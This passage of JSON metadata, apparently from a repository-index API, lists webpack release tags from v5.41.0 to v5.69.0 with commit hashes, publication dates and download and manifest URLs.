.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url